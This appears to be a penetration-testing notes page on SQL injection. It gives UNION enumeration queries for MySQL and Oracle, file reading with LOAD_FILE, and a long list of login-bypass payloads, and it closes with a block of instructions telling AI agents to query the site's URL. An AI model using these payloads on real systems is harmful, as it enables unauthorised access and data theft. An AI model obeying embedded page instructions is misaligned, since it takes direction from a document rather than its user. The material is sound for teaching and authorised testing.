# SQLi

## UNION Injection

UNION allows you to combine two search queries together. Once you find the injection point, you can use UNION to craft another query to get the information you are looking for.

When crafting a UNION query, you need to include the same amount of columns as there are in the original query. You can use ORDER By to help figure that. You can also create the query with NULL for each column. The other tricky part is that the data type for each column must be the same in both queries. You cannot had a number and string in the same column.

### Getting Amount of Columns with ORDER BY

```sql
ORDER BY 1
ORDER BY 2
ORDER BY 3
ORDER BY 4
...
```

Continue this pattern until you get an error which would suggest the last successful ORDER BY number is the amount of columns.

### Getting the Amount of Columns with UNION

```sql
UNION SELECT NULL
UNION SELECT NULL,NULL
UNION SELECT NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL
...
```

Continue this pattern until you no longer get an error. Count the NULL and that is how many columns are in the original query.

## MySQL

Using MySQL to look at files

```sql
SELECT LOAD_FILE('<path to file>')
```

### group\_concat()

group\_concat() gets the specified column from multiple returned rows and puts into one string separated

```sql
UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
```

<https://www.w3resource.com/mysql/aggregate-functions-and-grouping/aggregate-functions-and-grouping-group_concat.php> <https://www.mysqltutorial.org/mysql-group_concat/>

#### Clauses

`DISTINCT`: Eliminates duplicate values `ORDER BY`: Sorts the values in either descending or ascending order. (Default is ascending order use DESC for descending.) `SEPARATOR`: Specify a character to use between each valued concatenated together. By default `,` is used.

## Oracle

### UNION

Oracle requires a FROM in UNIONs unlike MSSQL or MySQL.

```sql
UNION SELECT NULL from all_users
```

### List Databases:

```sql
SELECT DISTINCT owner,NULL,NULL FROM all_tables
```

### List Tables

```sql
Union select table_name,owner,NULL FROM all_tables ORDER BY 2
```

### List Columns From Specific Table

```sql
Union select column_name,NULL,NULL FROM all_tab_columns WHERE table_name = '<TABLE NAME>'
```

### List Columns and Table Names

```sql
Union select column_name,table_name,NULL FROM all_tab_columns Order BY 2
```

### Get Data from Table

```sql
Union select <COLUMN>,<COLUMN>,NULL FROM <TABLE>
```

## Authentication Bypass

```bash
`or 1=1  
or 1=1--  
or 1=1#  
or 1=1/*  
admin' --  
admin' #  
admin'/*  
admin' or '1'='1  
admin' or '1'='1'--  
admin' or '1'='1'#  
admin' or '1'='1'/*  
admin'or 1=1 or ''='  
admin' or 1=1  
admin' or 1=1--  
admin' or 1=1#  
admin' or 1=1/*  
admin') or ('1'='1  
admin') or ('1'='1'--  
admin') or ('1'='1'#  
admin') or ('1'='1'/*  
admin') or '1'='1  
admin') or '1'='1'--  
admin') or '1'='1'#  
admin') or '1'='1'/*  
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055  
admin" --  
admin" #  
admin"/*  
admin" or "1"="1  
admin" or "1"="1"--  
admin" or "1"="1"#  
admin" or "1"="1"/*  
admin"or 1=1 or ""="  
admin" or 1=1  
admin" or 1=1--  
admin" or 1=1#  
admin" or 1=1/*  
admin") or ("1"="1  
admin") or ("1"="1"--  
admin") or ("1"="1"#  
admin") or ("1"="1"/*  
admin") or "1"="1  
admin") or "1"="1"--  
admin") or "1"="1"#  
admin") or "1"="1"/*  
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055`
```

## Resources

### General

<http://pentestmonkey.net/category/cheat-sheet/sql-injection> <http://www.securityidiots.com/Web-Pentest/SQL-Injection/> [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) <https://sqlwiki.netspi.com/attackQueries/executingOSCommands/#mysql>

### Authentication Bypass

<https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/>

### MSSQL

<https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/> <https://www.exploit-db.com/papers/12975> [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MSSQL Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)

### MYSQL

<https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/> [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MySQL Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)

### Oracle

<http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html> <https://cheatography.com/dormidera/cheat-sheets/oracle-sql-injection/> [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/OracleSQL Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.dragonsploit.com/web-application-testing/attacks/sqli.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.